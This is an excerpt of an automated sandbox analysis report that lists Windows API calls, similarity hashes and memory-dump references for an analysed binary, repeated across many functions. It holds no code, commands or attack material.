• API String ID: 3379773720-0
• Opcode ID: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
• Instruction ID: c5a9f548720e127460bbd30f9c4a1142764b372a0404ca0a71d180b9b8c9b2b0
• Opcode Fuzzy Hash: f450223117ea95bfee34014d9d84978b58918b7dbb146b9b64e9adf8c20a5af9
• Instruction Fuzzy Hash: E8415671A002096BDB14EF95D981AEF77BC9F58314F00405EFA0567281E7789E46CBE9
APIs
• GetWindowRect.USER32(?,?), ref: 00449A4A
• ScreenToClient.USER32(?,?), ref: 00449A80
• MoveWindow.USER32(?,?,?,?,?,00000001), ref: 00449AEC
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: Window$ClientMoveRectScreen
• String ID:
• API String ID: 3880355969-0
• Opcode ID: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction ID: 772f2e9a8c44c8b90650fefa000f178a1b73e5e444e4323f54854131c67d2362
• Opcode Fuzzy Hash: d0f348dd6b8999688d199205b3412f9258e7834e979bdc0e5f61431c3cd0f715
• Instruction Fuzzy Hash: 5A517C70A00249AFEB14CF68D8C1AAB77B6FF58314F10822EF91597390D774AD90DB98
APIs
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: __flsbuf__flush__getptd_noexit__write_memmove
• String ID:
• API String ID: 2782032738-0
• Opcode ID: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction ID: 72632960f292c6e9309c64fc9b7016af72cb639159fa0dd3c9cf05ee08d0b78d
• Opcode Fuzzy Hash: b31e9d6d4fc57bcba7966bec51b765adca5e1eea9d7940e8138ef5a4af09ff03
• Instruction Fuzzy Hash: CB41D531A00715ABDB248FA5C8486DFBBB5AFD0364F24856EF42597680D778DDC1CB48
                                                                        APIs
                                                                        • ClientToScreen.USER32(00000000,?), ref: 0044169A
                                                                        • GetWindowRect.USER32(?,?), ref: 00441722
                                                                        • PtInRect.USER32(?,?,?), ref: 00441734
                                                                        • MessageBeep.USER32(00000000), ref: 004417AD
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$BeepClientMessageScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 1352109105-0
                                                                        APIs
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,?,00000000), ref: 0045D248
                                                                        • GetLastError.KERNEL32(?,00000000), ref: 0045D26C
                                                                        • DeleteFileW.KERNEL32(00000000,?,?,00000000), ref: 0045D28C
                                                                        • CreateHardLinkW.KERNEL32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 0045D2AA
                                                                        Similarity
                                                                        • API ID: CreateHardLink$DeleteErrorFileLast
                                                                        • String ID:
                                                                        • API String ID: 3321077145-0
                                                                        APIs
                                                                        • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00420873
                                                                        • __isleadbyte_l.LIBCMT ref: 004208A6
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,000001AC,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 004208D7
                                                                        • MultiByteToWideChar.KERNEL32(BBDAE900,00000009,?,00000001,00000000,00000000,?,?,?,0042D7C1,?,00000000), ref: 00420945
                                                                        Similarity
                                                                        • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                        • String ID:
                                                                        • API String ID: 3058430110-0
                                                                        APIs
                                                                        • GetParent.USER32(?), ref: 004503C8
                                                                        • DefDlgProcW.USER32(?,00000138,?,?), ref: 00450417
                                                                        • DefDlgProcW.USER32(?,00000133,?,?), ref: 00450466
                                                                        • DefDlgProcW.USER32(?,00000134,?,?), ref: 00450497
                                                                        Similarity
                                                                        • API ID: Proc$Parent
                                                                        • String ID:
                                                                        • API String ID: 2351499541-0
                                                                        APIs
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442AC9
                                                                        • TranslateMessage.USER32(?), ref: 00442B01
                                                                        • DispatchMessageW.USER32(?), ref: 00442B0B
                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00442B21
                                                                        Similarity
                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                        • String ID:
                                                                        • API String ID: 1795658109-0
                                                                        APIs
                                                                        • GetForegroundWindow.USER32(?,?,?), ref: 0047439C
                                                                          • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                          • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                          • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                        • GetCaretPos.USER32(?), ref: 004743B2
                                                                        • ClientToScreen.USER32(00000000,?), ref: 004743E8
                                                                        • GetForegroundWindow.USER32 ref: 004743EE
                                                                        Similarity
                                                                        • API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
                                                                        • String ID:
                                                                        • API String ID: 2759813231-0
                                                                        APIs
                                                                          • Part of subcall function 00430626: _wcspbrk.LIBCMT ref: 00430636
                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                        • SendMessageW.USER32(?,00001060,00000000,00000004), ref: 00449507
                                                                        • _wcslen.LIBCMT ref: 00449519
                                                                        • _wcslen.LIBCMT ref: 00449526
                                                                        Similarity
                                                                        • API ID: MessageSend_wcslen$_wcspbrk
                                                                        • String ID:
                                                                        • API String ID: 2886238975-0
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                        • String ID:
                                                                        • API String ID: 1792727568-0
                                                                        APIs
                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                        Similarity
                                                                        • API ID: Window$Long$AttributesLayered
                                                                        • String ID:
                                                                        • API String ID: 2169480361-0
                                                                        APIs
                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                        • String ID: cdecl
                                                                        • API String ID: 3850814276-3896280584
                                                                        • Opcode ID: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                        • Opcode Fuzzy Hash: 6cbd38251dd4a86e43de7c927aee515647cd65b84628e0119afa42224a7639cc
                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                        APIs
                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 2502553879-0
                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                        APIs
                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$LongWindow
                                                                        • String ID:
                                                                        • API String ID: 312131281-0
                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                        APIs
                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastacceptselect
                                                                        • String ID:
                                                                        • API String ID: 385091864-0
                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                        APIs
                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                        • String ID:
                                                                        • API String ID: 1358664141-0
                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                        APIs
                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                        • String ID:
                                                                        • API String ID: 2880819207-0
                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                        APIs
                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                        • String ID:
                                                                        • API String ID: 1187119602-0
                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
                                                                        Similarity
                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1597257046-0
                                                                        • Opcode ID: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                        • Opcode Fuzzy Hash: a4231aec4d80d75c49e81e4c27ca68212e1c2fe3aff6bb962a105ec03e57c75a
                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
APIs
• GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
• __malloc_crt.LIBCMT ref: 0041F5B6
• FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.0000000000492000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594218659.00000000004A8000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594252701.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_xBzBOQwywT.jbxd
Similarity
• API ID: EnvironmentStrings$Free__malloc_crt
• String ID:
• API String ID: 237123855-0
• Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
• Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
• Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
APIs
Memory Dump Source
• Source File: 00000000.00000002.1594125296.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1594110219.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594170507.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594188890.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1594203550.0000000000491000.00000008.00000001.01000000.00000003.sdmp
